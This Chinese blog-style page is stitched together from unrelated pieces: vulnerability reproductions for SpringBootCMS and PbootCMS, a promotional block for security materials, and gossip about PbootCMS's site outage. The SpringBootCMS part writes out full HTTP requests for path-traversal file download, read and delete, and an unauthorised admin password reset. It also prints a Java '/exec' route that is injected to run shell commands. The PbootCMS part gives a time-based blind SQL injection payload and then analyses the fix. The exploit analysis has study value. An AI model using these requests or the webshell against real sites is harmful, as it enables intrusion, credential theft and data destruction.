pbootcms漏洞修复-Pbootcms教程-爱模板网

pbootcms漏洞修复

2024-04-03 11:34:03

SpringBootCMS漏洞复现分析

SpringBootCMS，极速开发，动态添加字段，自定义标签，动态创建数据库表并crud数据，数据库备份、还原，动态添加站点(多站点功能)，一键生成模板代码，让您轻松打造自己的独立网站，同时也方便二次开发，让您快速搭建个性化独立网站，为您节约更多时间。

环境搭建

修改 src/main/resources/application.properties 中对应的数据库地址，在本地创建数据库并导入根目录下的 sql 文件

运行 src/main/java/com/cms/App.java

漏洞复现分析未授权任意文件下载

GET /common/file/download?fileKey=../../resources/application.properties HTTP/1.1Host: localhost:8888User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.83 Safari/537.36Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: :8888/Accept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9Connection: close

com.cms.controller.common.FileController#download

通过传过来的参数 fileKey? 未经过任何过滤就拼接到读取文件的路径中，最后读取该文件并下载返回

【----帮助网安学习，需要网安学习资料关注我，私信回复“资料”免费获取----】
① 网安学习成长路径思维导图
② 60+网安经典常用工具包
③ 100+SRC漏洞分析报告
④ 150+网安攻防实战技术电子书
⑤ 最权威CISSP 认证考试指南+题库
⑥ 超1800页CTF实战技巧手册
⑦ 最新网安大厂面试题合集（含答案）
⑧ APP客户端安全检测指南（安卓+IOS）

越权修改管理员密码

系统中存在演示账号，演示账号的用户名和密码为 read/123456，演示用户在前端并不能操作相关功能，但是可以通过直接构造数据包，触发相对应的功能

POST /admin/admin/reset HTTP/1.1Host: localhost:8888Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.83 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Sec-Fetch-Site: same-originSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentReferer: :8888/admin/roleAccept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9Cookie: JSESSIONID=7CD6B69DCC495750492D0D89B4713A52Connection: closeContent-Type: application/x-www-form-urlencodedContent-Length: 4id=1

成功修改了管理员 admin 的密码，修改为 123456

com.cms.controller.admin.AdminController#reset?

com.cms.filter.PermissionFilter#doFilter?

根本原因是没有将 reset 操作添加在过滤中，导致演示账号也可以执行重置密码的操作。

其他的操作就会有相关的提示

授权任意文件读取

构造链接

:8888/admin/template/edit?directory=default/../../../resources/&fileName=application.properties

com.cms.controller.admin.TemplateController#edit?

对传入的参数 directory 和 fileName 未进行任何处理就拼接到 filepath 中读取并显示

授权任意文件修改可 getshell

查找其中不需要授权就可以访问到的路由对应的文件

:8888/admin/template/edit?fileName=../../../../src/main/java/com/cms/controller/common/FileController.java

添加恶意代码，增加命令执行的路由文件

@RequestMapping("/exec") public void exec(String command,HttpServletRequest request, HttpServletResponse response) throws Exception{ // 执行命令并获取输出结果 ProcessBuilder processBuilder = new ProcessBuilder(); processBuilder.command("cmd", "/c", command); Process process = processBuilder.start(); // 读取命令输出的结果 String output = ""; BufferedReader inputReader = new BufferedReader(new InputStreamReader(process.getInputStream())); String line; while ((line = inputReader.readLine()) != null) { output +=line; } response.setHeader("Content",output); }

重启项目后，发送路由信息

com.cms.controller.admin.TemplateController#update?

漏洞存在的原因是因为在更新代码的时候，没有对代码内容进行校验，可任意修改代码，写入恶意代码就会触发命令执行

授权任意文件删除

构造数据包

GET /admin/database/delete?name=../../../../../test.txt HTTP/1.1Host: localhost:8888Cache-Control: max-age=0Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.83 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9Cookie: JSESSIONID=410D94FAA33FE9021AD6B0C3E842F9F9Connection: close

com.cms.controller.admin.DatabaseController#delete?

??com.cms.utils.BackupUtils#delete?

pbootcms代码审计笔记

环境搭建

　　利用 phpstudy 轻松搭建 pbootcms 环境，但是在搭建过程中，我们自己设定 phpstudy 的解析域名不行，需要获取授权码，除了到官网去申请外，我们也可以直接通过修改域名为 localhost 绕过。

　　因为默认是 SQLilte 数据库直接就可以安装好，但是为了后面注入的我们将数据库改为 MYSQL 数据库

　　修改 config/database.php

　　将文件 static/backup/sql/pbootcms_v310.sql 导入到创建好的数据库中

　　我们可以通过任意的报错信息获取 pbootcms 的版本信息

漏洞复现

　　我们先对漏洞进行复现，之后再做一个整体的分析

　　我们向index.php 传参 ?1%27

　　我们发现直接爆出了 SQL 语句

　　尝试闭合

　　?1%27)and(%271

　　构造数据包

`pythonGET /index.php?1')and(sleep(5))and('1 HTTP/1.1Host: localhostUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.83 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-Dest: documentAccept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9Connection: close

　　发现成功使得服务器沉睡五秒

　　是属于 SQL 盲注再进一步的做具体验证

　　substr((select(database())),1,1)like'p' 为true 我们本身对应的数据库名为 pbootcms 所以证明SQL 注入无误

　　证实漏洞已经存在，我们就对漏洞进行一个分析

漏洞分析静态逆向分析

　　为了找到漏洞代码的位置，我们直接从执行 SQL 语句的函数，添加断点，判断执行 SQL 的内容

　　这里我是直接打印出 SQL 语句并停止程序

　　\core\database\Mysqli::query

　　看到了 SQL 语句就直接进行查询，全局搜索后发现调用来自于

　　\app\home\model\ParserModel::getSort

　　而注入的参数就是 $scode

　　寻找 getSort 的调用，并查看其参数是否可控

　　最终在

　　\app\home\controller\IndexController::_empty

　　path 就是来自于路由器的匹配

动态正向调试

　　\app\home\model\ParserModel::getSort

　　\core\basic\Model::find

　　\core\database\Mysqli::one

　　\core\database\Mysqli::query

漏洞修复

　　在最新版本中这个漏洞已经被修复，我们跟进查看一下漏洞修复方法

　　apps/home/controller/IndexController.php::_empty

　　我们看到对路由进行了转义处理，如此一来对 SQL 注入的防护似乎达到的一劳永逸的效果，修复方式还是很不错，在入口处添加转义函数，对路由进行转义处理，从而避免掉 SQL 注入

PbootCms崩了，速吃瓜

自从织梦宣布商业收费后，各大站长纷纷将织梦转移转化到其他系统，其中PBOOTCMS是为数不多的开源并免费商用的建站利器，

今天，PbootCms官方群里炸锅了，原因是PbootCms官网崩了，可把我吓坏了

访问官网显示：执行SQL发生错误！错误：Got error 28 from storage engine

版本：程序版本：3.1.3-20211111